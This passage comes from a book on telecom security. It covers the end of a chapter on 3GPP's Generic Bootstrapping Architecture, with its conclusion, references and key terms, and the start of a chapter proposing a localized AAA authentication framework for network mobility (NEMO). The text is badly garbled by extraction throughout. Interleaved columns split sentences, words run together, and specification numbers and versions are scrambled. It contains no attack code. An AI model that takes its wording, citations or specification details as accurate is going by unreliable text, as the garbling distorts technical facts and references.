the Liberty Alliance Project Identity Federation quickly into the scene. The most prominent drivers
Framework and the Web Service Framework. The ofmobileandfixedconvergenceoutsideofGPP 3
detailsofthisinterworkingarespecified in GPP
3
are TISPAN and CableLabs.
technical report (3GPP TR 33.980, Release 6). The telecoms & Internet converged services
These are only some examples of the possible & protocols for advanced networks (TISPAN) is
usage of GBA outside of 3GPP, many non-stan- a standardization body of the ETSI (n.d.). TISPAN
dardized use cases are also enablers. GBA could focuses on fixed networks and migration from
be utilized for enterprise access or other use cases
0
switched circuit networks to packet-based net- futurE trEnds And gEnErIc

works with an architecture that can serve in both. AutHEntIcAtIon In bEyond 3g
TISPANsharesthesameIMSspecifiedbyGPP. 3 nEtworks
The idea is to keep the unity of IMS preserved by
specifying the IMS core in 3GPP and TISPAN The wider deployment of adoption of GBA by
specificadd-onsinTISPANorGPP, 3 dependingthe OMA created the need for a solution that an
on the working groups’ agreements. application server can trigger the key generation
TheTISPANReleasewhich 1 wasfinalizedin and send the needed key generation data (not the
2006 is based upon the 3GPP IMS Release 6 and keys) to the mobile terminal. If this functionality
selected aspects of Release 7 architecture (which is available it would allow that the continuous
finishesearly.0TISPAN 27 ) standardizesfunc - service provisioning and a broader usage of GBA-
tionalities or brings them into 3GPP for present based functionalities for broadcast use cases. 3GPP
and future converged networks, including the next startedworkingonaTechnicalSpecificationGBA
generation networks (NGN). TISPAN utilizes GBA Credential Push SpecificationGPP 3 ( TS,32.
in their security architecture (ETSI TS 187.003, Release 8) that allows an application server (NAF)
2006) for the protection of the XMLconfiguration to trigger key generation procedure at the network
accessprotocol(XCAP)trafficbetweenaterminal side and push the required data to the terminal.
and an application server using 3GPP TS 33.222 Upon receiving this data the terminal would gener-
(2006) over their Ut interface. Optionally, an AP ate the keys without having a channel back to the
can be integrated into this interface. network.Thespecificationworkforhasstartedin
CableLabs ( http://www.cablelabs.com/) is a 3GPP, and is targeted to be part of Release 8..
consortium of cable network providers with focus GBA has also been utilized to establish a shared
on Northern America. They are interested in uti- secret between two entities. The main element in
lizingtheGPP 3 specificationsintheirsystems. In is so-called NAF key center, and it
this use case
November 2006 a work item description that out- can be used establish shared secret between either
lines the intended convergence security work was between the UICC and the ME (3GPP TS 33.110
approved in 3GPP security group document number Release 7) or between two devices where one of
(3GPP Work Item Description S3-060764, 2006) the devices is holding the UICC, and the other is
with the title “IMS Enhancements for Security not (3GPP TS 33.259, Release 7). This shared secret
Requirements in Support of Cable Deployments.” can then be used to secure the link between those
This work item proposes, among other extensions, two entities. The secure communication can then
alsoCableLabsspecificextensiontothe beGPP
3 used
GBAfor any kind of application, for example,
“core”specificationTS3(Release 02. 3 The
. )6 out - streaming.
lined extensions include the possibility to bootstrap The work on future networks after 3G has
a shared secret from a username/password. In other started in GPP. 3 The work on the definition of a
words, the user would authenticatesecurity in a first step
framework for the core network system
with his/her username/password. This pair would architecture evolution (SAE) and for the radio
then serve as a baseline for further application- access network long term evolution (LTE) is
specifickeygeneration.Theuserwouldnot need
ongoing. Sometimes, this work is also referred to
to remember a new username/password pair for as fourth generation (4G) or B3G networks. The
every service, but would potentially just have one work there assumes that there will be larger range
CableLab username/password pair that could also of networks and that mobility between them is a
be centrally managed. The details of this are work key requirement. GBA was chosen as an enabler
in progress and the final key derivation methods
for mobile IP security in the setting that the related
andfurtherdetailsstillhavetobehome fully defined
agent (3GPPinHA) resides in the 3G network.
the near future (i.e., during year 2008). The SAE/LTE work is just evolving, so further
usage of GBA and additions and modifications

can be expected with the progress of the work. On secret can then be used for many purposes, like
a high level, the basic trust relationship between username/password authentication, certifica
theMobileIPcommunicationpartnersdefines enrollment,theDRM, and so forth. GBA was origi-
needed security associations independently of the nally designed by the 3GPP, but has recently been
actual protocol version used. taken up for long term evolution networks, fixed
There is the trust relationship between the ter- broadband access, and cable networks.
minal and the 3GPP authentication, authorization
and accounting (AAA) server that resides in the
user’s home network and is in charge of the user AcknowlEdgMEnt
authentication (e.g., using AKA) and authorization.
This trust relationship is founded on the user’s Part of this work has been performed in the frame-
subscription to his/her home network and secured work of the IST project System Engineering for
via a shared secret that can be assumed to be long- Security and Dependability SERENITY and the
lived. The mobile IP authentication is independent Service Platform for Innovative Communication
of the access authentication, which is analogous to Environment (SPICE) project. The authors would
the case, where a user uses a service and requires like to acknowledge the contributions and review
authentication there. Hence, GBA could be could of their colleagues from Nokia Corporation.
be used for mobile IP key provisioning.
The second trust relationship is between the
3GPP Mobile IP (MIP) HA and the user’s terminal, rEfErEncEs
so that the HA can act on behalf of the terminal
for the tasks related to mobility. The relationship 3rd Generation Partnership Project 2 (3GPP2) TS
between these two entities is established dynami- S.S0109-0. (2006). Generic bootstrapping archi-
cally (in the sense that there is no pre-provisioned tecture (GBA) framework, version 1.0. Retrieved
shared secret) so the integrity of the MIP signaling from http://www.3gpp2.org/Public_html/specs/
can be ensured and depends on the actual mobile S.S0109-0_v1.0_060331.pdf
IP version used, that is, Mobile IP4 or Mobile IP6
(or DS-MIPv6). 3GPP has at the point of writing 3rd Generation Partnership Project (3GPP) Work
only made the decision for Mobile IP4. The deci- Item Description S3-060764. (2006, November).
sions if MIPv6 or DS-MIPv6 will be used are not IMS enhancements for security requirements in
yet taken in 3GPP (status December 2006). support of cable deployments. Retrieved from
The third trust relationship is between the http://www.3gpp.org/ftp/tsg_sa/WG3_Security/
3GPP MIP HA and the 3GPP AAA server. The TSGS3_45_Ashburn/Docs/
trust between those nodes is high, since they are 3rd Generation Partnership Project (3GPP) TS
part of the same network for non-roaming case. 24.109. (Release 6). Bootstrapping interface (Ub)
For non-roaming cases there exist interoperator andnetworkapplicationfunctioninterface(Ua);
security protocols, like network domain security Protocol details. Retrieved from http://www.3gpp.
(NDS)/IP securityor IPsec. This trust relation- org/ftp/Specs/html-info/24109.htm
ship does not require GBA, since there is no user
involvement. 3rd Generation Partnership Project (3GPP) TS
29.109. (Release 6). Generic authentication ar-
chitectureGAA) ( ;ZhandZninterfacesbasedon
conclusIon the Diameter protocol;Retrieved
Stage .3 from
http://www.3gpp.org/ftp/Specs/html-info/29109.
The GBA allows secure provisioning of a shared htm
secret to a mobile terminal and an application 3rd Generation Partnership Project (3GPP) TS
server based on cellular authentication. This shared 33.110. (Release 8). Key establishment between

UICC and a terminal. Retrieved from http:// 3rd Generation Partnership Project (3GPP) TR
www.3gpp.org/ftp/Specs/html-info/33110.htm 33.920. (Release 7). SIM card based generic boot-
strappingarchitectureGBA) ( Early
; implementa
-
tion feature. Retrieved from http://www.3gpp.
33.203. (Release 7). G3 security; Access secu -
org/ftp/Specs/html-info/33920.htm
rity for IP-based services. Retrieved from http://
www.3gpp.org/ftp/Specs/html-info/33203.htm 3rd Generation Partnership Project (3GPP) TR
33.978. (Release 6). Security aspects of early
IP multimedia subsystems (IMS), version .065
33.220. (Release 6). Generic authentication archi-
Retrieved from http://www.3gpp.org/ftp/Specs/
tectureGAA) ( Generic
; bootstrappingarchitecture.
html-info/33978.htm
Retrieved from http://www.3gpp.org/ftp/Specs/
html-info/33220.htm Calhoun, P., Loughney, J., Guttman, E., Zorn,
(RFC 3588). Retrieved from http://www.ietf.
33.221. (Release 6). Generic authentication archi-
org/rfc/rfc3588.txt
tectureGAA) ( Support
; forsubscribercertificates.
Retrieved from http://www.3gpp.org/ftp/Specs/ Eronen, P., & Tschofenig, H. (Eds). (2005). Pre-
html-info/33221.htm shared key ciphersuites for transport layer security
(TLS) (RFC 4279). Retrieved from http://www.ietf.
org/rfc/rfc4279.txt
33.222. (Release 6). Generic authentication ar-
chitectureGAA) ( ; Access to network application
functions using hypertext transfer protocol over (ETSI). Telecoms & Internet converged services
transport layer security (HTTPS). Retrieved from & protocols for advanced networks (TISPAN).
http://www.3gpp.org/ftp/Specs/html-info/33222. Retrieved from http://www.etsi.org/tispan
htm
3rd Generation Partnership Project (3GPP) TS (ETSI) TS 187 003. (2006). Telecoms & Internet
33.223. (Release 8). Generic authentication converged services & protocols for advanced
architecture GAA) ( ; Generic bootstrapping
- networksar(TISPAN). NGN security—Security
chitecture (GBA) push function. Retrieved from architecture, version 1.1.1. Retrieved from http://
http://www.3gpp.org/ftp/Specs/html-info/33223. www.etsi.org/tispan
htm
Gerstenberger, V., Lahaije, P., & Schuba, M.
3rd Generation Partnership Project (3GPP) TS (2004). Internet ID—Flexible re-use of mobile
33.246. (Release 6). 3G security, security of mul- phone authentication security for service access.
timedia broadcast/multicast service (MBMS). In Proceedings of the th 9 (NordSec)
, Helsinki,
Retrieved from http://www.3gpp.org/ftp/Specs/ Finland (pp. 58-64).
html-info/33246.htm
Open Mobile Alliance (OMA) BCAST Working
3rd Generation Partnership Project (3GPP) TR Group. (2006). Broadcast service and content
33.918. (Release 7). Generic authentication archi- protection for mobile broadcast services, version
tectureGAA) ( Early
; implementationofhypertext1.0. Retrieved from http://www.openmobileal-
transfer protocol over transport layer security liance.org/
(HTTPS) connection between a universal integrat-
Open Mobile Alliance (OMA) Location Work-
ed circuit card (UICC) and a network application
ing Group. (2006). Secure user plane location
function (NAF). Retrieved from http://www.3gpp.
architecture (SUPL), version 3.0. Retrieved from
org/ftp/Specs/html-info/33918.htm
http://www.openmobilealliance.org/

Open Mobile Alliance (OMA) Presence and Avail- Cellular Authentication: Cellular authentica-
ability Working Group (PAG). (2006). Presence tion is the authentication process that is used when
SIMPLE architecture, version 2.0. Retrieved from a mobile phone is attached to a network (e.g., GSM
http://www.openmobilealliance.org/ or UMTS network). This authentication is based on
a smart card that is inserted in the mobile phone.
Open Mobile Alliance (OMA) Presence and
Availability Working Group (PAG). (2006). XML Generic Authentication Architecture (GAA):
document management architecture (XDM), ver- GAA is an architecture that is built on top of GBA
sion 1.0. Retrieved from http://www.openmobile- that utilizes the shared secret to gain access to
alliance.org/ service.
Open Mobile Alliance (OMA) Security Work-
Generic Bootstrapping Architecture (GBA):
ing Group. (2005). OMAGBAprofile,version.0 1
GBA is an architecture where cellular authentica-
Retrieved from http://www.openmobilealliance.
tion is used to bootstrap a shared secret between
org/
a mobile phone and a network node.
Rescorla, E., & Modadugu, N. (2006). Data-
gram transport layer security (RFC 4347). Re- Mobile Application: Mobile application is
trieved from http://www.ietf.org/rfc/rfc4347.txt an application that resides on a server and can be
accessed or consumed by a mobile device. The ap-
plication may require a dedicated software element
kEy tErMs in the mobile terminal (e.g., for mobile TV).
Second Generation Generic Bootstrapping
Application Security: Application security
Architecture (2G GBA): 2G GBA describes the
encompasses a large range of measures taken to
usage of the GBA with legacy SIM smart cards. It
prevent incidents with respect to the security policy
does not contain the integration of legacy network
of an application or the underlying framework.
nodes.
Application security is realized through design
and deployment of the application. Universal Integraged Circuit Card (UICC):
UICC is the smart card (e.g., SIM card) used in
Authentication And Key Agreement (AKA):
mobile terminals in GSM and UMTS networks.
AKA is a mechanism where a mobile device and
mobile network operator authenticate and distrib-
ute shared key(s) to be used between them. This
process is based on a long-term shared secret that
is in the mobile terminal (namely in UICC, e.g.,
SIM card), and mobile network operators databases
(e.g., Home Location Register [HLR]). GBA is
based on this process.
Authentication: Authentication is the attempt
to verify the digital identity of the sender of an
authentication request.

Chapter XXV
Authentication,
Authorization, and Accounting
(AAA) Framework in Network
Mobility (NEMO) Environments
Sangheon Pack
Korea University, South Korea
Sungmin Baek
Seoul National University, South Korea
Taekyoung Kwon
Yanghee Choi
AbstrAct
Network mobility (NEMO) enables seamless and ubiquitous Internet access while on-board vehicles.
Even though the Internet Engineering Task Force (IETF) has standardized the NEMO basic support
protocol as a network layer mobility solution, little studies have been conducted in the area of authenti-
cation, authorization, and accounting (AAA) framework that is a key technology for successful deploy-
ment.Inthisarticle,wefirstreviewtheexistingAAAprotocolsandanalyzetheirsuita
environments. After that, we propose a localized AAA framework to retain the mobility transparency as
the NEMO basic support protocol and to reduce the signaling cost incurred in the AAA procedures. The
proposed AAA framework supports mutual authentication and prevents various threats such as replay
attack, man-in-the-middle attack, and key exposure. Performance analysis on the AAA signaling cost is
carriedout.NumericalresultsdemonstratethattheproposedAAAframeworkisefficien
NEMO environments.
Authentication, Authorization, and Accounting Framework in Network Mobility Environments
IntroductIon (CNs) during movements. Packets sent by CNs are

firstaddressedtothehomenetworkoftheMONET.
With the advances of wireless access technologies Then, the HA intercepts the packets and tunnels
(e.g., third generation [3G], IEEE 802.11/16/20) them to the MR’s registered address, that is, the
and mobile communication services, the demand CoA on the egress link. To deliver packets towards
for Internet access in mobile vehicles such as the MR’s CoA, the NEMO basic support protocol
trains, buses, and ships is constantly increasing makes a bi-directional tunnel between the HA and
(Ott & Kutscher, 2004). In these vehicles, there the MR. This tunneling mechanism is similar to the
are multiple devices constituting a vehicular area solution proposed for host mobility support, that
network (VAN) or personal area network (PAN) is, Mobile IPv6 without route optimization.
that may access to Internet. This kind of services To make network mobility services feasible in
is referred to network mobility (NEMO) services. publicwirelessInternet,well- defined
authentica-
Recently, many studies have been conducted for tion, authorization, and accounting (AAA) proto-
network mobility (Information Society Technolo- cols should be accompanied. However, to the best
gies [IST], 2003; Keio University, 2002). Regarding of our knowledge, little work has been conducted
mobility management, the Internet Engineering for AAA protocols in network mobility services.
Task Force (IETF) has established a working Even though a number of AAA protocols have
group called NEMO (IETF, 2006) and the NEMO been proposed for host mobility, all of them are
working group has proposed an extended Mobile based on per-node AAA operations and therefore
IPv6 protocol (Johnson, Perkins, & Arkko, 2003), they cannot be directly applied to the MONET
that is, the NEMO basic support protocol (De- containing two different types MNNs:localfixed
varapalli, Wakikawa, Petrescu, & Thubert, 2005). nodes (LFNs) and visiting mobile nodes (VMNs).
Throughout this chapter, we consider the NEMO An LFN belongs to the subnet to the MR and is
basic support protocol as a mobility management unable to change its point of attachment, while a
framework. VMN is temporarily attached to the MR’s subnet
According to the terminologies in Ernst and by obtaining its CoA from the MNP. The VMN’s
Lach, 2005), a mobile network (MONET) is de- home network may have different administrative
fined as a network whose point of attachment policy (e.g.,to
billing) from the current attached
the Internet varies as it moves about. A MONET MONET. Therefore, a new AAA procedure for
consists of mobile routers (MRs) and mobile net- VMNs is required.
work nodes (MNNs). Each MONET has a home In this chapter, we propose a localized AAA
network to which its home address belongs. When protocol that provides efficient AAA procedures
the MONET is in the home network, the MONET is for both LFNs and VMNs in NEMO environments.
identifiedby its
home address (HoA). On the other The proposed AAA protocol is consistent with the
hand, the MONET configurescare-of-address
a NEMO basic support protocol. In other words, indi-
(CoA) on the egress link when the MONET is away vidual AAA operations for LFNs within a MONET
from the home network. At the same time, on the are not performed; instead, the MR is authenticated
ingresslink,theMNNsoftheMONETconfigure on behalf of the LFNs. On the other hand, each
CoAs, which are derived from the subnet VMN prefix
attached to the MONET performs its AAA
(i.e., mobile network prefix [MNP]). The MNP operation in an individual manner. The proposed
remains assigned to the MONET while it is away AAA protocol has the following advantages: (1) the
from the home network. The assigned MNP is proposed AAA protocol localizes the AAA proce-
registered with the home agent (HA) according dure using a local AAA key when the MR hands
to the NEMO basic support protocol. off within the same foreign network. Therefore,
The main objective of the NEMO basic support theAAAsignalingtrafficalso, ( theAAAlatency)
protocol is to preserve established communications canbesignificantlyreduced.WeanalyzetheAAA
between the MONET and correspondent nodes signaling traffic via an analytical model in the

Signaling Cost Analysis section; (2) the proposed bAckground

AAA protocol allows mutual authentication and
prevents various security attacks such as replay In this section, the AAA protocol in Mobile IPv6
attack and man-in-the-middle attack. The security is described as a reference model. Although sev-
analysis is given in the fourth section; (3) from the eral AAA protocols have been proposed in the
point of view of Internet service providers (ISPs), literature, we adopt the Diameter extension for
how to charge a VMN for its network usage is a Mobile IPv6 protocol (Le, Patil, Perkins, & Faccin,
critical issue. The proposed AAA protocol sup- 2004) because it is the only valid IETF Internet
ports a exible
fl billing mechanism in which the
draft as of this writing. The Diameter extension
VMN is informed of a billing agreement between for Mobile IPv6 allows a mobile node (MN) to
the MR’s home network and the new foreign net- access a network of a service provider after the
work. Accordingly, the proposed AAA protocol AAA procedures based on the Diameter protocol
is a suitable solution when the MONET hands off (Calhoun, Loughney, Guttman, Zorn, & Arkko,
between different networks with different billing 2003) is completed.
or service policies. This protocol considers a network architecture
The remainder of this chapter is organized as for AAA services, as shown in Figure 1. The AAAv
follows. In the next section, an existing AAA pro- is an AAA server in the visited (foreign) network,
tocol for Mobile IPv6 is introduced as a reference while the AAAh is an AAA server in the home
protocol. The third section proposes a localized network of the MN. Hereafter, we assume that the
AAA protocol and the fourth section analyzes AAA client is located at each access router (AR).
the security of the proposed AAA protocol. In The AAA client performs three tasks: (1) allow-
thefifthsection,ananalyticalmodelfor ing the
the MNAAAto be authenticated, (2) generating
signaling cost is developed and numerical results accounting data for the MN’s network usage, and
are presented, respectively. The sixth section con- (3) authorizing the MN to use network resources.
cludes this chapter. ByLeetal.an )024( MNisidentifiedbyitsnet -
work access identifier ( NAI)Aboda ( & Beadles,
Figure1.MobileIPv6AAAarchitecture
HA
AAAh
Internet (IPv6)
Home network
AAAv
Ar Ar
foreign link 1 foreign link 2
foreign network
Mobile node

1999), which is globally unique. An MN and its receipt of the HOR message, the HA creates a key to
AAAh have a long-term key, and communication establish a security association (SA) with the MN,
between the AAAv and AAAh is secure. and replies with a Home-Agent-MIPv6-Answer
Themessageow fl intheDiameterextension for (HOA) message to the AAAh. Then,
Command
Mobile IPv6 is illustrated in Figure 2. When enter- the AAAh constructs the AA-Registration-Answer
ing a new network or at power up, an MN listens Command (ARA) message that has an authen-
to an AR’s router advertisement (RA) message tication result and sends it to the AAAv. When
which has a local challenge and a visited network receiving the ARA message from the AAAh, the
identifier. Then, the MN sends an
authentication AAAv stores the authentication result locally and
request (AReq) message to the AAA client (i.e., AR) then forwards the message to the AAA client. The
based on the security key shared with its AAAh. AAA client converts the ARA message into the
When the AAA client receives the AReq message, authentication reply (ARep) message, in order to
it creates an AA-Registration-Request Command inform the MN of the authentication result from
(ARR) message and sends it to the AAAv. Then, the AAAh and deliver the established key (for the
the AAAv relays it to the AAAh of the MN. When SA) to the MN.
receiving the ARR message from the AAAv, the
AAAh authenticates the MN by means of the
NAI and sends a Home-Agent-MIPv6-Request
Command (HOR) message to the MN’s HA. Upon
Figure2.MessageflowintheAAAprotocolforMobileIPv6

locAlIzEd AAA frAMEwork In When the MONET changes its point of attach-
nEMo EnvIronMEnts ment, the MR needs to be authenticated and autho-
rized before it accesses a new domain in the same
system Architecture foreign network (i.e., intra-domain handoff) or a
new foreign network (i.e., inter-domain handoff).
In this section, the AAA architecture in NEMO To accomplish this, the MR and AR authenticate
environments is introduced with basic assumptions each other through a mutual authentication pro-
and concepts (e.g., SA and challenge/response cedure that involves both the AAAH server of the
authentication). Figure 3 illustrates the reference MR and the AAAL server of the AR. An attendant
AAA architecture in NEMO environments based (which is the same as an AAA client) is an entity
on the Diameter protocol. that triggers authentication procedures to the AAA
The AAA architecture consists of multiple system. In Mobile IPv6 networks, ARs normally
autonomous wireless networks, each of which is act as the attendants for an MN. In the proposed
called a domain. Each domain has an AAAH server AAA protocol, the AR serves as an attendant for
and/or an AAAL server in order to authenticate any the MR’s authentication, whereas the MR serves
node in a Diameter-compliant manner. The AAAH as an attendant for VMN’s authentication. In the
server of the MR has the profile of the MR latter
and case, the MR broadcasts attendant advertise-
it shares a long-term key with the MR. Likewise, ment messages and receives authentication request
the AAAH server of the VMN shares a long-term messages from VMNs within a MONET. In other
key with the VMN. The AAAL server is in charge words, an attendant (an AR or MR) requests the
of an AAA procedure for a visiting MONET (i.e., AAAL server to authenticate the MONET (the
VMNs and MRs). The trust relationship between MR or VMN). When the AAAL server receives
the MR’s AAAH server and the AAAL server the authentication request, it verifies the id
in the visited network is maintained through the of the MONET by cooperating with an AAAH
Diameter protocol. server. In terms of SAs, we assume that the MR’s
AAAH server and the VMN’s AAAH server have
Figure 3. AAA architecture in NEMO environments
HA HA home link of Mr
home link of vMn
AAAHvMn AAAHMr
Internet (IPv6)
AAAl
Ar
foreign link 3
Ar
foreign link 1
Ar
Ar foreign link 4
foreign link 2
Mr
nEMo
Mnn Mnn
: movement of MonEt

a pre-established SA. In addition, it is assumed that for dynamic keys K LOCAL and K HOME, and their sizes
the MR and LFNs have already authenticated each are 32 bytes. Note that a dynamic key is used to
other by a mechanism, which is beyond scope of establish a dynamic SA while a long-term key is
this chapter. to establish a long-term SA. Other notations will
Notations used in this chapter are summarized be elaborated later.
in Table 1. A local challenge (LC) is a random IntheproposedAAAprotocol,wedefinetwo
number for authentication procedures. An MR or Internet Control Message Protocol (ICMP) mes-
VMNencryptstheLCusingapre-definedSAwith sages (Conta & Deering, 1998), Attendant Solicit
its AAAH server. The encrypted value is called a and Attendant Advertisement messages, which are
credential (CR), which is used to authenticate an similar to Router Solicit and Router Advertisement
MRthatcreatesit.MRsandVMNsareidentified messages, respectively. In these messages, we
by their NAIs and a replay protection indicator introduce a new Attendant advertisement option
(RPI), which is used to protect from a replay at- and it is used for the authentication of VMNs for an
tack. Either a timestamp or a random number can intra-domain handoff. In addition, several Diameter
be used as an RPI. The size of the K AAA field is messages, for examples, AA-Mobile-Router-Re-
128 bytes by assuming a public key cryptography questandAA-Mobile-Router-Answer,aredefined.
algorithm. We adopt a symmetric key cryptography Their functions will be described later.
Table 1. Notations for the localized AAA protocol
Typical Length
Field Meaning
(bytes)
LC local challenge 8
MC mobile challenge 8
NAI identity of MR or VMN 20
RPI replay protection indicator 4
H@ home address 16
HA@ home agent address 16
Co@ care of address of MR or VMN 16

K AAA pre-shared SA between an MR and an AAAH server 128 (public key)
K AH pre-shared SA between an AAAH server and an HA 128 (public key)
K AL pre-shared SA between an AAAH server and an AAAL server 128 (public key)
CR credential 8
CR L local credential 8
K LOCAL dynamic SA between an MR and an AAAL server 32 (symmetric key)
CR M mobile credential 8
K HOME dynamic SA between an MR and its AAAH server 32 (symmetric key)
SPLOCAL security parameters for constructing K LOCAL 12
SPHOME security parameters for constructing K HOME 12
00
Mobile router Authentication If these two values are identical, the MR is

successfully authenticated. Then, the AAAH
Inter-Domain AAA Procedure server generates two dynamic keys: one is a
KLOCAL (to be explained later) for intra-domain
When a MONET enters a new foreign network AAA procedures in the foreign domain and
domain, an inter-domain AAA procedure is trig- the other is a K HOME for a secure bi-directional
gered. Since the MR does not have any SA with tunnel between the MR and the MR’s HA. To
the AAAL server in the foreign network domain, allow the MR to generate K LOCAL and K HOME,
it should be authenticated with its AAAH server the AAAH server also generates SPHOME and
located in its home network domain. The message SP LOCAL
, and sends them to the MR. These
ows
fl fortheinter-domainAAAprocedure - areil
security parameters are encrypted using the
lustrated in Figure 4 and the detailed descriptions long-term key between the MR and AAAH
are as follows: server to avoid the possibility of exposure to
other network entities.
• Step 6: The AAAH server informs the HA
• Step 1: The MR sends an Attendant Solicit of the MR’s NAI and SPHOME using the AA-
message to the attendant, that is, AR. Home-Agent-Request (AHR) message.
• Step 2: As a response to the Attendant So- • Step 7: The HA constructs K HOME by using
licit message, the AR sends an Attendant SP HOME
and replies with an AA-Home-Agent-
Advertisement message including an LC. AnswerAHA) ( messageasconfirmation.
Even without the Attendant Solicit message, • Step 8: The AA-Mobile-Router-Answer
the AR broadcasts Attendant Advertisement (AMA) message is used for the AAAH server
messages periodically. to notify the AAAL server of the authentica-
• Step 3: The MR encrypts the received LC tion result. When the AAAL server receives
value using its long-term SA with the AAAH the AMA message with authentication ap-
server and makes a CR, which enables the proval, the AAAL server decrypts the mes-
MR’s AAAH server to authenticate the MR. sage using the long-term key (K AL) with the
Then, the MR sends an AReq message that AAAH server, records the MR’s NAI, and
contains the LC and CR to the AR (i.e., at- constructs K LOCAL.
tendant). The AReq message also contains • Step 9: The AAAL server re-encrypts the
the MR’s NAI and RPI, which are used for received AMA message from the AAAH
the AAAL server to identify the MR’s home server after excluding EKAL(SPLOCAL) and
domain and to protect from replay attack. sends it to the AR.
• Step 4: When the AR receives the AReq • Step 10: When receiving the AMA message,
message, it converts it into an AA-Mobile- the AR learns that the MR is successfully
Router-Request (AMR) message. After then, authenticated and grants the MR’s network
the AR sends the AMR message to the AAAL access. Therefore, the AR informs the MR of
server in the foreign domain. the result by the ARep message containing
• Step 5: The AAAL server detects that it can- SPHOME, SPLOCAL, home agent address, and so
not authenticate the MR locally by checking forth. On receipt of the ARep message with
theNAIfieldandhenceforwardstheAMR authentication approval, the MR can access
message to the MR’s AAAH server. When the the foreign network. At the same time, the
AAAH server receives the AMR message, it MR generates KHOME and KLOCAL using SPHOME
encrypts the LC using the pre-established SA and SPLOCAL, respectively.
and compares the result with the CR value.
0
Figure 4. MR’s AAA procedure for inter-domain handoff
Intra-Domain AAA Procedure CR used in the inter-domain AAA procedure. At

this time, the AReq message contains MC for mu-
To support real-time multimedia applications in tual authentication. The CR L is an authentication
NEMO environments, it is important to reduce code generated using K LOCAL. Then, the attendant
the latency for AAA operations. Therefore, when constructs an AA-Mobile-Router-Local-Request
a MONET changes its point of attachment within (AMLR) Diameter message and sends it to the
the same foreign domain, our protocol enables the AAAL server. When the AAAL server receives the
MR to be authenticated through a localized AAA AMLR message, the AAAL server authenticates
procedure with the AAAL server in the foreign the MR by using K LOCAL, which has been already
network without any interaction with its AAAH stored at the AAAL server during the inter-domain
server. That is, the AAAL server of the foreign AAA procedures. Moreover, the AAAL server
network can authenticate the MR using K LOCAL, constructs CR M by encrypting the MC value and
which was introduced for the inter-domain AAA informs the AR of the result via the AA-Mobile-
procedure in the previous section. Router-Local-Answer (AMLA) message. Then, the
Figure 5 illustrates the intra-domain AAA AR transmits the result (i.e., the ARep message)
procedure. As a response to the Attendant Ad- to the MR. The MR receiving the ARep message
vertisement message, the MR sends the AReq verifiesthe M
CR to authenticate the foreign
value
message containing CR L, which is different from network, that is, mutual authentication.
0
Figure5.MR’sAAAprocedureforinfra-domainhandoff
visiting Mobile node (vMn) to the MR’s AAAH server (AAAHMR) through a
Authentication secured bi-directional tunnel. When the AAAHMR
receives the AMR message, it sends the AMR mes-
A VMN is a visiting MN that accesses the Internet sage to the AAAHVMN that has a shared SA and
through an MR in a MONET. According to the requests the AAA procedure for the VMN. Then,
NEMO basic support protocol, the VMN does not the AAAH VMN
authenticates the VMN. During
need to know whether its attached router is the these steps, K HOME, K LOCAL, SPHOME, and SPLOCAL
AR or the MR. Therefore, the AAA protocol for are created, which is similar to the inter-domain
VMNs should be consistent with this requirement. AAA procedure of the MR. After completion of
The VMN in a MONET uses the home network AAA procedures, the VMN registers its CoA
prefix of the MR as its IPv6 network prefix. configured
(
- Ac usingtheMNP)withitsHA.
cordingly, the VMN will deem it to be in the MR’s After the initial authentication and binding
home network. For VMN authentication, the MR update procedures, VMNs within a MONET do
serves as an attendant for VMNs and the MR’s not need to know whether the MONET changes
AAAH server serves as an AAAL server. its point of attachment or not. Thus, VMNs do
Figureillustrates
6 messageows fl forthe AAA to register their locations to their HAs
not have
procedure when a VMN is attached to a MONET. even though the MONET hands off. This mobility
As mentioned previously, the MR acts as an at- transparency is the key advantage of the NEMO
tendant. Hence, the MR broadcasts Attendant Ad- basic support protocol. However, if the mobility
vertisement messages periodically or responds to transparency is strictly provided, the AAAL server
an Attendant Solicit message from the VMN with in the foreign network cannot detect the existence
an Attendant Advertisement message. The VMN of VMNs. In other words, the mobility transpar-
creates a CR using a pre-shared SA with its AAAH ency is beneficial to reduce the binding update
server (AAAHVMN) and sends an AReq message to traffic, however, it makes the accounting/ billing
the MR. Then, the MR converts the AReq message of VMNs’ network usages hard. To address this
into a Diameter message, AMR, and then sends it problem, in our protocol, the AAAL server in the
0
Figure6.VMN’sAAAprocedure
foreign domain accounts the total network usage MR sends an Attendant Advertisement message
of the MONET (not individual VMNs) and then with a set R bit when the foreign domain has a
this collective accounting/billing information is different policy and thus a new AAA procedure
delivered to the MR’s AAAH server. At the same is required. Hence, from the Attendant Advertise-
time, the MR’s AAAH server maintains the ac- ment message, the VMN determines whether it
counting/billing information for the MR as well should perform a new AAA procedure or not. We
as individual VMNs.1 Consequently, the MR’s assume that each network domain can have different
AAAH server can differentiate the accounting/bill- policies, so that the VMN performs a new AAA
ing information for MRs and VMNs. In addition, procedure for each inter-domain handoff.
we assume that the MR’s AAAH server and the
VMN’s AAAH server have a trust relationship
and a shared SA. Therefore, the accounting/billing sEcurIty AnAlysIs
information collected at the MR’s AAAH server is
securely transferred to the VMN’s AAAH server In this section, we analyze the proposed AAA
for suitable billing. protocol in terms of mutual authentication and
In addition, the mobility transparency causes security attacks (e.g., key exposure, replay attack,
another problem, that is, how to authorize VMNs and man-in-the-middle attack).
when the MONET moves to a foreign domain with
a different billing policy. To solve this problem, an
0
Mutual Authentication Then, the MR can authenticate the AAAL

server in the foreign network by verifying that
Mutual authentication is a security feature in which EK LOCAL ( MC ) is equal to CR M. Consequently, a
a client (i.e., the MR and VMN) must prove its malicious network cannot offer fake services to an
identity to a service (i.e., network), and the service MR because it cannot compute CR M, and mutual
must prove its identity to the client. To provide authentication is achieved.
mutual authentication in the NEMO AAA proto-
col,tworequirementsshouldbesatisfied: )the
1(
key Exposure
MR or VMN authenticates the foreign network;
and (2) the foreign network authenticates the MR K AAA is a pre-shared key between an MR and the
or VMN. AAAH server, and K LOCAL and K HOME are created
Specifically, mutual authentication in the using security parameters, SPLOCAL and SPHOME,
proposed AAA protocol is achieved as follows. respectively. Thus, it is desirable not to leak these
First, for the inter-domain authentication, mutual keys to the other network entities.
authentication is provided by establishing a session With respect to K LOCAL, the AAAH server en-
key, K LOCAL. In other words, the objective of inter- crypts SPLOCAL using K AL and sends it the AAAL
domain authentication protocol is that the MR and server. At the same time, the AAAH server send
the AAAL server believe that they share K LOCAL the encrypted SPLOCAL using K AAA to the MR.
with each other. The MR creates CR as Therefore, the encrypted SPLOCAL can be decrypted
CR = EK AAA ( LC ) only by the AAAL server and the MR because
(1) they have K AL or K AAA. In other words, if K AL and
